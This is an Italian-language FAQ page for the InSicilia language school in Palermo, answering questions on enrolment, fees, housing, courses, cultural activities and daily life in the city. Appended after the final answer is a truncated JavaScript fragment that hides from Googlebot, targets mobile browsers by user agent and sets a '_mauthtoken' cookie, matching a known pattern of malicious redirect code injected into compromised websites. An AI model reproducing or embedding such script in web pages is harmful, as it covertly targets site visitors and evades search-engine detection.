In questa sezione trovi raccolte le domande più frequenti relative ai diversi aspetti dell’attività del Centro, suddivise in 5 sezioni:

Domande generali

Cosa fare per iscrivermi?

Nelle Condizioni di partecipazione troverai ogni informazione necessaria all’iscrizione e relativa all’attività del nostro Centro. Ti consigliamo di leggerle attentamente! Comunque per iscriversi ai corsi è necessario verificare il proprio livello linguistico attraverso il test d’ingresso che potrai trovare nella sezione TEST. Individuato il livello di partenza, potrai compilare il modulo di iscrizione (nella sezione Modulistica) e inoltrare mediante bonifico bancario la quota di iscrizione (Є 50,00) e la prima quota del costo dell’attività scelta, pari al 50% dell’importo (vedi Listino Prezzi). Puoi versare l’intero costo del corso con unico bonifico o se preferisci il pagamento in 2 soluzioni, potrai versare la seconda quota a saldo al tuo arrivo al Centro. Dopo avere effettuato l’iscrizione verrai contattato per definire la data del colloquio orale che potrà anche avvenire via Skype prima del tuo arrivo. 


 Cosa copre la quota di iscrizione?

La quota di iscrizione comprende:
- L’incontro di benvenuto;
- Il test di livello;
- L’Attestato di frequenza;
- L’assistenza nella ricerca dell’alloggio in base alle esigenze dello studente;
- Un pacchetto di benvenuto con informazioni turistiche e mappa della città;
- Una visita guidata tematica;
- La partecipazione libera ad un evento;
- Il materiale didattico di consumo.
I libri di testo non sono inclusi e vanno acquistati a parte. 


Come e quando devo effettuare il pagamento?

Individuato il livello di partenza, potrai compilare il modulo di iscrizione (nella sezione Modulistica) e inoltrare mediante bonifico bancario la quota di iscrizione (Є 50,00) e la prima quota del costo dell’attività scelta, pari al 50% dell’importo (vedi Listino Prezzi). Puoi versare l’intero costo del corso con unico bonifico o se preferisci il pagamento in 2 soluzioni, potrai versare la seconda quota a saldo al tuo arrivo al Centro. 


Come sono composte le classi (età, nazionalità ecc…)?

Quello che accomuna gli allievi di una classe è il livello di competenza posseduto, quindi gli studenti possono essere estrememente eterogenei per età, nazionalità, ma anche per le ragioni per cui vogliono imparare la lingua italiana. L’eterogeneità è quasi sempre motivo di arricchimento, di varietà e, perché no, di divertimento. 


Cosa devo fare quando arrivo in aeroporto?

Se hai prenotato il nostro servizio transfer saremo noi a farci individuare attraverso un cartello con il tuo nome (o con il nome del vostro gruppo). Se decidi invece di raggiungere autonomamente la città, l’Aeroporto Internazionale Falcone-Borsellino Punta Raisi si trova a 32 km dalla città ed è collegato con Palermo dal servizio di bus navetta e dalla rete ferroviaria.
L’aeroporto di Trapani-Birgi si trova a circa 2 ore da Palermo ed è collegato con il centro della città con un Bus (Terravision e AutoServizi Salemi). 


Cosa succede se il mio corso viene annullato?

E’ veramente difficile che un corso venga annullato, ma, se dovesse accadere, sarà nostra cura realizzare ugualmente le lezioni anche per un solo studente senza costi aggiuntivi. 


Quanto dura un’unità di lezione?

Ogni unità di lezione prevede 50 minuti di attività e 10 minuti di pausa. Ogni giorno il docente stabilisce, sulla base dell’attività in programma, di accorpare o dividere le pause previste. 


Come posso frequentare un corso se il mio periodo di soggiorno non corrisponde ai calendari della vostra offerta?

Il nostro Centro realizza anche programmi costruiti su specifiche esigenze, quindi non esitare a contattarci anche se non individui sul calendario delle date compatibili con i tuoi programmi. 


Le lezioni non svolte nei giorni di festività saranno poi recuperate?

No, di norma no. la scuola rispetta la festività e le lezioni non vengono recuperate (né viene rimborsato il costo) tranne in casi specifici legati a Corsi volti all’acquisizione di Certificazioni riconosciute. 


Quali sono gli orari di apertura del Centro?

La segreteria InSicilia è aperta da lunedì a venerdì dalle 9.00 alle 13.30 e dalle 14.30 alle 18.00. 


Posso svolgere i miei compiti nel Centro al pomeriggio?

Si, un’aula è destinata allo studio e all’apprendimento individuale e l’utilizzo è gratuito. 


Posso collegarmi a Internet dal Centro?

Presso il nostro Centro a disposizione degli studenti c’è una postazione informatica completa che consente il collegamento ad internet gratuito per gli studenti. 


Se non mi trovo bene nel mio corso, posso cambiare livello?

Il nostro Centro cura molto bene l’assegnazione dell’allievo al livello corrispondente alla sua preparazione. Ma se si dovessero verificare dei casi di piazzamento non coerente, sarà insieme all’insegnante che verrà analizzata la possibilità di inserimento in una classe di livello diverso. 


Cosa succede se mi iscrivo, pago la quota, ma non posso più fare il Corso?

E’ possibile recedere dal contratto chiedendo la cancellazione dell’iscrizione al Corso o Laboratorio mediante comunicazione scritta A.R. indirizzata ad Asterisco presso la sede di Palermo, Via Marchese di Villabianca n. 70 – CAP 90143, entro 10 giorni lavorativi dalla sottoscrizione. In tal caso, la quota d’iscrizione di € 50,00 non è rimborsabile e non è trasferibile da persona a persona. Nel caso di rinuncia comunicata al Centro entro 10 giorni lavorativi prima dell’inizio del Corso o Laboratorio prenotato, lo studente avrà diritto al rimborso del primo acconto eventualmente versato, detratte le spese bancarie necessarie alla restituzione della somma. Nel caso in cui la comunicazione di rinuncia sia comunicata oltre il termine di 10 giorni lavorativi sopra indicato, Asterisco non è tenuto ad effettuare alcun rimborso né a consentire il trasferimento della somma in oggetto a favore di altro richiedente l’iscrizione. 


Perché devo avere un livello intermedio per accedere ai Corsi Speciali?

Perché i Corsi speciali sono volti ad una conoscenza specifica e di alto livello nei rispettivi ambiti proposti (Italiano per affari, Giuridico, Medico scientifico e Italiano e Dizione) ed è opportuno che il requisito di ingresso sia la padronanza almeno di livello intermedio della lingua Italiana. 


Il Laboratorio di Cucina prevede esperienza “in cucina”?

No, il Laboratorio “Italiano e Cucina” è un laboratorio di tipo itinerante: prevede una prima fase teorica in aula dedicata alla cultura e alle tradizioni della cucina siciliana ed una fase itinerante attraverso un “percorso del cibo”, con degustazioni, in particolare, del cibo di strada. 


Perché definite i laboratori itineranti?

Alcuni laboratori prevedono delle visite in giro per la città, da qui il nome di itineranti, perché sviluppano degli itinerari specifici che accelerano la conoscenza nello specifico ambito di riferimento e consentono al partecipante di vivere un’esperienza coinvolgente e divertente. 


Se perdo un giorno di lezione posso recuperarlo?

No, di norma non è possibile recuperare un giorno di lezione in cui si è stati assenti. Si può però acquistare una lezione individuale per recuperare il programma svolto. 


Se devo ripartire all’improvviso, perdo la quota pagata e non goduta?

Si, purtroppo si. In caso di interruzione del corso non è possibile ottenere restituzione delle quote versate né trasferire il diritto ad altra persona. 


Chi sono gli insegnanti?

Gli insegnanti InSicilia sono Esperti altamente specializzati nell’insegnamento della Lingua Italiana agli stranieri e tutti Madrelingua italiana e con preparazione di livello universitario e post universitario. 


Il personale del Centro è rintracciabile fuori dall’orario delle lezioni?

Per le emergenze sarà disponibile per gli studenti un numero di cellulare per reperibilità anche durante il week-end oppure in orario serale infrasettimanale. 


In quale tipologia di Azienda può essere svolto il tirocinio?

In qualsiasi tipologia di azienda presente sul territorio, sia aziende private che, nel caso del Programma Leonardo ed Erasmus, pubbliche. 


Le Visite di studio vengono organizzate per gruppi di lavoratori?

Generalmente si, ma il Centro organizza programmi su specifiche richieste anche individuali. 


E’ possibile svolgere un tirocinio nel vostro Centro?

Si, è possibile effettuare un tirocinio presso il nostro Centro. L’ambito di attività verrà definito a seguito di colloquio teso a valutare le aspettative e le attitudini. La scelta è fatta anche in funzione del livello di conoscenza della lingua posseduto. 


E’ possibile avere delle lezioni individuali?

Si, è possibile. Sono lezioni assolutamente personalizzate sulle specifiche esigenze del singolo studente. 


Qual è il numero minimo per attivare i Laboratori?

Sia i Corsi che i Laboratori sono attivati per un minimo di 4 studenti. 


Il Laboratorio Italiano e Vini prevede degustazioni di Vini?

Si, è una reale immersione nel mondo dei Vini siciliani, un viaggio alla scoperta anche delle loro fragranze. 


Quali materiali didattici vengono usati durante le lezioni?

Durante le lezioni gli insegnanti utilizzeranno libri, risorse didattiche specifiche per le diverse attività ma anche articoli di giornali, programmi radio e film: tutto ciò che potrà essere di ausilio all’apprendimento e che nel contempo potrà rendere l’attività varia e stimolante. 


Chi ha bisogno di un Visto?

Per chi non è appartenente all’Unione Europea:
per un periodo di permanenza inferiore ai 3 mesi è sufficiente un visto turistico;
per un periodo di permanenza oltre i tre mesi è necessario un visto di studio. In tal caso sono necessari i seguenti documenti:

• passaporto valido
• certificato di iscrizione a InSicilia
• dichiarazione di disponibilità finanziaria relativa al periodo previsto in Italia
• assicurazione a copertura di eventuali problemi di salute e ricovero in Italia.

per un periodo di permanenza fino ad un anno va richiesto un visto di studio di tipo D. In caso di permanenza superiore ad un anno, è possibile rinnovare il visto di tipo D in Italia.

E’ però opportuno richiedere specifiche informazioni all’Ambasciata o al Consolato italiani nel proprio Paese in quanto ogni Paese ha specifici accordi con il Governo italiano.

Regole generali comunque sono:
• l’Ambasciata italiana non rilascia visti per corsi che prevedono meno di 20 ore settimanali
• l’Ambasciata italiana richiede una conferma del pagamento parziale o totale del corso anticipatamente.
• sono necessarie un certo numero di settimane. 


Se dovessi avere un’emergenza di salute a chi posso rivolgermi ?

Il Pronto Soccorso dell’ospedale è attivo per le emergenze (Gli indirizzi vengono forniti nel kit consegnato il prmo giorno). In caso di necessità potrai rivolgerti a una persona del nostro staff, sempre reperibile. Inoltre, c’è sempre una farmacia di turno aperta 24 ore su 24 . Ti ricordiamo di parlare con la tua assicurazione sanitaria per capire come funziona per la copertura di eventuali spese mediche in Italia.

Alloggio

Che tipologie di alloggio proponete?

Ogni tipologia di alloggio: casa per studenti (la più richiesta), B&B, casa ad uso esclusivo, ostello, alberghi. Per tutti gusti, le esigenze e tasche!!


Cosa significa casa di studenti?

La casa per studenti è un appartamento condiviso solo da studenti, di differente provenienza ed età. Sono case con arredamento spartano ma corredate da tutto ciò che serve per un soggiorno più o meno lungo. E’ la soluzione ottimale per trascorrere un buon periodo senza spendere tanto. E’ dotata di uso di cucina, quindi ci si può cucinare da sè il cibo. La convivenza è regolata da un regolamento interno affinché sia migliore possibile per tutti.


Posso cambiare alloggio se non mi trovo bene?

Si, ma solo per motivi validi e giustificati. La segreteria InSicilia è disponibile per valutare le singole richieste e trovare adeguata soluzione.


Che tipo di biancheria da casa trovo nell’alloggio per studenti ?

Gli alloggi hanno in dotazione lenzuola e coperte (oltre pentole, tovaglie, bicchieri, piatti e posate per la cucina). Lo studente deve provvedere agli asciugamani, carta igienica, bagnoschiuma e prodotti per l’igiene personale. E’ opportuno portare un asciugacapelli.


Qual è il numero massimo di studenti che vivono nella stessa casa?

Il numero varia rispetto alla tipologia di casa: da 4 fino ad otto studenti. In casa è possibile avere la stanza ad uso esclusivo (più costosa) o in condivisione (meno costosa).


Le spese (elettricità, acqua, gas) sono comprese nel prezzo dell’affitto?

Si, il costo settimanale prevede anche il consumo di luce, gas e acqua.


Trovo Internet nell’appartamento?

Internet è possibile averlo in appartamento ma è un servizio extra che deve essere espressamente richiesto ed ha un costo aggiuntivo.


A cosa si riferisce il servizio di lavanderia?

E’ un servizio extra, a pagamento, che può essere richiesto. Soprattutto in caso di soggiorni lunghi è comodo richiedere il servizio lavanderia per potere mantenere contenuto il proprio bagaglio. 


A quanti Volts funziona l’elettricità in Italia?

L’elettricità in Italia funziona a 220 Volts. Per usare qualsiasi apparecchio elettrico è sufficiente un adattatore. 


Gli alloggi quanto distano dal Centro di Lingua?

Dipende da dove sono situati, se nel centro storico o nel centro commerciale della città. InSicilia è comunque ben servita dal servizio di trasporto pubblico. 


Come trovo l’alloggio quando arrivo in città? 

Se hai richiesto il servizio navetta (opzionale e a pagamento) verrai accompagnato all’alloggio. Altrimenti ti verranno date prima dell’arrivo le informazioni necessarie per raggiungere l’alloggio. 


Posso ricevere ospiti a casa?

Si, è possibile ospitare amici o parenti pagando un extra, ma concordando preventivamente con la scuola e con il proprietario dell’alloggio. 


Posso allungare il mio periodo di permanenza restando nello stesso alloggio?

E’ possibile farlo ma ovviamente concordandolo preventivamente. La segreteria farà il possibile per garantire lo stesso alloggio o individuarne un altro con le stesse caratteristiche. 


Trovo una lavatrice nella casa per studenti?

Nel modulo di richiesta alloggio dovrai indicare tutte le tue esigenze riguardo all’alloggio, quindi anche la possibilità di avere l’uso di una lavatrice.


La casa per studenti prevede degli orari di ritorno serale obbligatori?

No, non c’è il classico coprifuoco ma sono previste delle regole di serena convivenza a cui attenersi.


Avrò le chiavi della casa in cui vivo?

Si, ogni studente avrà in consegna le chiavi della casa (verrà richiesta a tal fine una cauzione). Chi ha necessità di avere una camera con serratura a chiave lo deve richiedere espressamente nel modulo di richiesta alloggio.


Il B&B garantisce il servizio di biancheria?

Si, in B&B è compreso nel prezzo il cambio biancheria.


E’ obbligatorio prenotare l’alloggio con voi?

No, non è obbligatorio.


Cosa comprende il costo dell’affitto della casa per studenti?

Il prezzo della camera comprende le spese di elettricità, riscaldamento, gas, acqua, uso della cucina e la pulizia della stanza il giorno dell’arrivo.


Cosa NON comprende il costo dell’affitto della casa per studenti e può essere acquistato extra?

I servizi extra su richiesta sono: internet, uso della lavatrice, aria condizionata, pulizie della propria stanza e spazi comuni durante il soggiorno. E’ responsabilità degli studenti, prevista dal Regolamento, tenere le stanze e gli spazi comuni in ordine e puliti. Nel caso in cui la stanza e gli spazi comuni non vengano tenuti in ordine, il proprietario può richiedere il pagamento extra per le pulizie.


Cosa devo fare per prolungare il periodo di soggiorno nell’alloggio?

Contattare prima possibile la segreteria del Centro ed il proprietario dell’alloggio. 


Cosa fare per disdire il soggiorno nell’alloggio ma non il corso?

contattare prima possibile la segreteria del Centro ed il proprietario dell’alloggio.


 E’ richiesta una cauzione nelle case per studenti? 

Si, i proprietari chiedono una cauzione sia per le chiavi che per eventuali danni all’abitazione. Lo studente viene informato prima dell’arrivo dell’ammontare della cauzione. 


 Quando viene rimborsata la cauzione? 

La cauzione verrà restituita alla fine del soggiorno.


Vorremmo avere l’alloggio per due ma solo uno di noi si iscrive al Corso. E’ possibile?

Si, è possibile avere il servizio di ricerca alloggio anche per gli accompagnatori che non si iscrivono alle attività del Centro. 


I costi dell’alloggio sono pagati direttamente al Centro di Lingua?

No, devono essere pagati all’agenzia di intermediazione oppure al proprietario dell’immobile. Prima dell’arrivo verrà data ogni necessaria informazione.


Quanto risparmio alloggiando in una casa per studenti? 

Il risparmio è notevole, ecco perché è la soluzione più richiesta!

Attività curriculari

Quando saprò in quale livello verrò inserito?

A seguito di correzione del test di piazzamento e del colloquio, che potrà essere realizzato anche via Skype.


Quanto dura un’unità di lezione?

Ogni unità di lezione prevede 50 minuti di attività e 10 minuti di pausa. Ogni giorno il docente stabilisce, sulla base dell’attività in programma, di accorpare o dividere le pause previste.


Le attività didattiche sono solo al mattino?

No, c’è un’ampia offerta di lezioni e laboratori anche nelle ore pomeridiane.


A che ora iniziano le lezioni mattutine?

Le lezioni cominciano alle ore 9 del mattino.


Posso frequentare corsi al pomeriggio?

I Corsi Standard e Intensivi sono al mattino. Le varianti Plus proseguono al pomeriggio. I Laboratori vengono anch’essi svolti al pomeriggio. Le lezioni individuali sono realizzate al pomeriggio. Quindi anche per le ore pomeridiane il Centro garantisce molte attività didattiche.


Se non mi trovo bene nel mio corso, posso cambiare livello?

Il nostro Centro cura molto bene l’assegnazione dell’allievo al livello corrispondente alla sua preparazione. Ma se si dovessero verificare dei casi di piazzamento non coerente, sarà insieme all’insegnante che verrà analizzata la possibilità di inserimento in una classe di livello diverso.


 Quali materiali didattici vengono usati durante le lezioni?

Durante le lezioni gli insegnanti utilizzeranno libri, risorse didattiche specifiche per le diverse attività ma anche articoli di giornali, programmi radio e film: tutto ciò che potrà essere di ausilio all’apprendimento e che nel contempo potrà rendere l’attività varia e stimolante.


Qual è il metodo di insegnamento adottato dal Centro?

La metodologia adottata da InSicilia predilige l’apprendimento attivo ed interattivo, anche con il supporto della multimedialità applicata all’apprendimento, con una particolare attenzione ai ritmi di apprendimento del singolo e agli interessi o alle richieste del gruppo aula. Il processo di apprendimento è incentrato sull’uso comunicativo della Lingua Italiana, inteso come capacità di espressione e di comprensione: al centro di questo processo è l’allievo, che impara a “usare” la lingua nei diversi contesti. E’ riservato molto spazio alla conversazione per permettere allo studente di sviluppare la capacità di esprimersi e comunicare in italiano. La conoscenza delle regole grammaticali sarà curata ugualmente ma senza togliere spazio alla comunicazione e conversazione in lingua, anche sin dal primo livello.


Posso condividere con un amico le lezioni individuali ed il relativo costo?

Di norma le lezioni individuali sono rivolte ad un solo studente, ma la Direzione valuta le richieste di lezioni individuali per 2 soggetti, anche per potere offrire servizi economicamente più accessibili. In tale caso il costo individuale sarà senz’altro più conveniente.


Perché devo avere un livello intermedio per accedere ai Corsi Speciali?

Perché i Corsi Speciali presuppongono un buon livello di conoscenza della lingua necessaria ad accedere a contenuti specialistici.


I libri di testo sono gratuiti?

No. Il Centro adotta libri di testo specifici per ogni attività. Il loro costo non è incluso nel costo del corso.


Perché definite i laboratori “itineranti”?

Alcuni laboratori prevedono delle visite in giro per la città, da qui il nome di itineranti, perché sviluppano degli itinerari specifici che accelerano la conoscenza nello specifico ambito di riferimento e migliorano le abilità comunicative del partecipante, consentendogli inoltre di vivere un’esperienza coinvolgente e divertente.


In cosa consiste la “Dichiarazione di competenza InSicilia”?

I Corsi Standard ed Intensivi prevedono, oltre l’attestato di partecipazione, il rilascio di una Dichiarazione InSicilia che definisce il livello di competenza raggiunto. E’ redatta dal nostro Centro sulla base del singolo percorso dello studente, costantemente monitorato dai nostri Insegnanti.


Chi sono gli insegnanti?

Gli insegnanti InSicilia sono Esperti altamente specializzati nell’insegnamento della Lingua Italiana agli stranieri e tutti Madrelingua italiana e con preparazione di livello universitario e post universitario.


E’ possibile avere delle lezioni individuali?

Si, è possibile. Sono lezioni assolutamente personalizzate sulle specifiche esigenze del singolo studente.


Qual è il numero minimo per attivare il Laboratorio di Italiano e musica popolare?

Sia i Corsi che i Laboratori sono attivati per un minimo di 4 studenti.


Il Laboratorio Italiano e Vini prevede degustazioni di Vini?

Si, è una reale immersione nel mondo dei Vini siciliani, un viaggio alla scoperta anche delle loro fragranze.


Nel calendario non vedo l’inizio del Corso Standard Plus. Quando prevedete di attivarlo?

I corsi Plus seguono l’andamento (e quindi le date) dei Corsi ordinari (Standard e Intensivo). Vengono attivati sulla base delle richieste degli iscritti.


Quante settimane di corso sono necessarie per completare un livello?

Abbiamo strutturato i corsi in 4 settimane perché lo riteniamo un periodo sufficiente per la realizzazione del programma completo relativo ad un livello.


In cosa consiste il colloquio di piazzamento via Skype?

Dopo avere fatto il test è opportuno effettuare un colloquio per definire ancor meglio il piazzamento. Tale colloquio può essere fatto in sede all’arrivo dello studente oppure via Skype prima dell’arrivo. Saranno i nostri Docenti che valuteranno, in base agli esiti della correzione del test, la modalità più opportuna.


Dopo 4 settimane di corso riesco a completare un livello?

I Corsi si strutturano in 4 settimane perché è ritenuto un periodo sufficiente per sviluppare tutto ciò che è contenuto in un livello. Ciò però non significa necessariamente che dopo 4 settimane si supera un livello, perché nell’apprendimento entrano in gioco molte variabili anche di tipo soggettivo. Ti consigliamo di sfruttare al massimo il periodo di permanenza ed esercitarti nella Lingua anche al di fuori del Centro e delle lezioni, nel tempo libero che passerai con altri studenti. Scopo delle attività extracurriculari offerte dal centro è anche quello di porgere altre e ulteriori opportunità di apprendimento anche divertendosi!


Che differenza c’è tra approccio culturale e linguistico nei Corsi proposti?

Il Corso Standard si rivolge a coloro che sono interessati a conoscere la cultura italiana e le ricche tradizioni di cui l’Italia (e la Sicilia) è ricca, attraverso lo studio della lingua. Il Corso Intensivo invece concentra maggiormente l’attenzione sulla lingua e le sue strutture ed è più indicato a chi vuole apprendere l’Italiano per ragioni professionali o per acquisire le certificazioni riconosciute.


Ho visto che il calendario propone corsi di 4 settimane ma io vorrei prolungare per 8 settimane. E’ possibile? Replico lo stesso corso?

Si, è certamente possibile frequentare corsi per periodi prolungati anche sino a 6 mesi. In tale caso verrà strutturata una programmazione individualizzata in base alle specifiche esigenze dello studente.


Per accedere ad un livello è sufficiente fare solo il test di piazzamento?

Il test di piazzamento non è sempre sufficiente per stabilire il livello di appartenenza. L’insegnante infatti può richiedere un colloquio via Skype oppure un colloquio in presenza all’arrivo per effettuare l’inserimento maggiormente rispondente alle reali competenze già possedute.


Cosa sono i pacchetti Primavera, Estate, Autunno e Inverno?

Sono le nostre promozioni legate alle stagioni: con l’approssimarsi del periodo in cui sono calendarizzate, inseriremo nella sezione del sito Promozioni tutte le informazioni relative al programma e ai costi. Approfittane!

Attività extracurriculari

Che tipo di attività culturale offre il Centro?

Il nostro Centro garantisce una svariata offerta di attività culturali per il proprio tempo libero: visite in città alla scoperta delle bellezze di Palermo, gite fuori porta, feste, aperitivi, cene in locali tipici, tandem linguistici, passeggiate in bicicletta …. E tanto altro ancora.


Quando potrò conoscere il programma culturale?

Fin dal primo giorno di arrivo e ogni venerdì per la settimana successiva.


Quando devo prenotare la mia partecipazione al programma culturale?

Entro il lunedì per la settimana in corso.


Quali sono le attività culturali gratuite?

Una visita guidata tematica e la partecipazione libera ad un evento sono gratuiti e compresi nella quota di iscrizione. Per le altre attività il costo varia a seconda della tipologia con un range che può andare da 8 a 25/30 euro. Il tandem e le gite in bicicletta sono gratuite ma prevedono solo un versamento di 1,50 euro per piccole spese organizzative.


Quali sono le attività culturali a pagamento?

Le visite culturali con guida, le gite fuori porta, gli aperitivi (tranne eventi speciali offerti dal Centro), le cene di gruppo in locali tipici.


Qual è il numero minimo di partecipazione alle attività culturali?

Varia da attività in attività ma riusciamo sempre ad organizzare con continuità anche per piccoli gruppi.


C’è un numero di attività culturali massimo a cui si può partecipare?

No, puoi partecipare a tutti gli eventi che vuoi.


Le attività culturali sono organizzate solo durante la settimana o anche al week-end?

Sia durante la settimana, ovviamente al di fuori dell’orario di lezione, che nel week-end.


I miei ospiti possono partecipare alle attività culturali?

Si, ma ricordati sempre di prenotare per tempo. I costi sono gli stessi anche per gli ospiti, senza alcuna maggiorazione.

Vivere a Palermo

Qual è la differenza di orario in Italia?

L’Italia si trova nella fascia oraria dell’Europa centrale, per cui nei mesi invernali Palermo è un’ora avanti rispetto a Londra, 6 ore rispetto a New York e 8 ore indietro rispetto a Tokyo e Sydney. Nei mesi estivi, l’orario cambia: con l’ora legale l’orologio va messo un’ora avanti!


Quali sono gli orari dei negozi e delle Banche in Italia?

I negozi di norma osservano un orario che va dalle 9.00 alle 13.00 e dalle 16.00 alle 19.30 o 20.00. I grandi Centri commerciali, alcuni supermercati e i negozi turistici hanno un orario di lavoro continuato e alcuni lavorano addirittura anche la domenica.
Le Banche invece dal Lunedì al Sabato dalle 8,30 alle 13,30 e alcune anche in orario pomeridiano dalle 15,00 alle 16,30.


Come mi muovo in città?

Il mezzo pubblico più utilizzato è sicuramente l’autobus. Le linee degli autobus a Palermo sono consultabili sul sito dell’azienda AMAT, che le gestisce (www.amat.pa.it). Accanto a quelle ordinarie sono presenti tre linee di tipo turistico, a costo ridotto, che attraversano il centro storico (linea rossa, gialla e verde); la linea 101, che attraversa tutta la città dalla Stazione Centrale allo stadio Renzo Barbera; e la 806 che collega il centro con la località balneare di Mondello. Sono presenti anche due linee notturne, N1 e N2.
Il costo del biglietto è di € 1,40 ed è valido 90 minuti dalla convalida. Esiste un biglietto valido 24 ore dalla prima obliterazione vivamente consigliato ai turisti.


Come mi muovo in tarda serata?

Sia in autobus (linea notturna N1 e N2) che in taxi (contattare al n. 091.6878). Night Shuttle è un servizio di navette che ti porta da casa al tuo locale preferito, e lo fa per tutta la città dalle 18:30 fino a tarda notte. Per tariffe e orari consultare il sito http://www.nightshuttle.it/.


Dove sono situati gli alloggi?

In varie parti della città in modo da soddisfare ogni esigenza e desiderio e a diversi livelli di costo: vicino al Centro InSicilia, al centro storico, vicino il centro commerciale della città.


Come funziona l’abbonamento Bus?

Il mezzo pubblico più utilizzato è sicuramente l’autobus. Le linee degli autobus a Palermo sono consultabili sul sito dell’azienda AMAT, che le gestisce (www.amat.pa.it). Accanto a quelle ordinarie sono presenti tre linee di tipo turistico, a costo ridotto, che attraversano il centro storico (linea rossa, gialla e verde); la linea 101, che attraversa tutta la città dalla Stazione Centrale allo stadio Renzo Barbera; e la 806 che collega il centro con la località balneare di Mondello.
Il costo del biglietto è di € 1,40 ed è valido 90 minuti dalla convalida. Esiste un biglietto valido 24 ore dalla prima obliterazione vivamente consigliato ai turisti. Sono presenti anche due linee notturne, N1 e N2.


Palermo è una città costosa?

Assolutamente no. Si mangia e si beve con pochi euro, ma dipende certamente dalle abitudini di ciscuno!


Che tipo di offerta ristorativa offre la città?

Palermo è famosa per il cibo ed in particolar modo per il cibo da strada. La città offre dal punto di vista ristorativo una grande offerta: dai locali take away di cibo da strada, alle trattorie di cucina tipica, ai ristoranti di cucina ricercata, dai pub ai wine bar, dove, all’ora dell’aperitivo è possibile bere e mangiare spendendo davvero poco. Per tutti i gusti e per tutte le tasche!


Quanto costa mangiare a Palermo?

Dipende da cosa vuoi mangiare: dal panino con le panelle che trovi anche ad € 1,50, alla brioches con gelato € 2,00, fino ad un piatto di pasta con frutti di mare € 7,00 oppure pizza € 8,00 … ce n’è veramente per tutti i gusti.


Che tipo di offerta sportiva offre la città?

La città è piena di palestre e centri sportivi con una grande varietà di sport e discipline. Anche gli abbonamenti sono di svariata tipologia: mensili, trimestrali ma anche giornalieri! Puoi certamente continuare a praticare sport durante la tua permanennza a Palermo.


Come arrivo in città dagli aeroporti?

L’Aeroporto Internazionale Falcone-Borsellino Punta Raisi si trova a 32 km dalla città ed è collegato con Palermo dal servizio di bus navetta e dalla rete ferroviaria. L’aeroporto di Trapani-Birgi si trova a circa 2 ore da Palermo ed è collegato con il centro della città con un Bus (Terravision e AutoServizi Salemi).


Cosa fare in caso di malattia durante la permanenza a Palermo?

Il nostro kit di benvenuto fornirà anche specifiche informazioni di questo tipo, relativamente al Pronto Soccorso, ai Medici, alle Farmacie di turno. 


Cosa fare in caso di smarrimento documenti?

In caso di smarrimento di passaporto occorre fare la denuncia alla Polizia o ai Carabinieri, presenti in qualsiasi zona della città. E’ opportuno informare l’Ambasciata o il Consolato del proprio Paese di provenienza.
In caso di smarrimento di carta di credito occorre bloccare subito la carta di credito tramite il numero verde della propria banca.


Qual è la migliore stagione per venire a trascorrere un periodo a Palermo?

Il clima è sempre bello a Palermo, città del sole! La nostra estete si prolunga spesso fino alla fine di ottobre e l’inverno non è mai rigido ma regala spesso bellissime giornate di sole. La primavera è un incanto di colori e profumi. La lunga e calda estate regala giornate indimenticabili a mare fino a tarda serata.


Come posso conoscere le attività culturali che offre la città?

All’interno del kit di benvenuto sono indicati alcuni siti web che informano su tutti gli eventi in città. La segreteria del nostro Centro comunque darà gli studenti molte informazioni su come passare al meglio il proprio tempo libero.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); 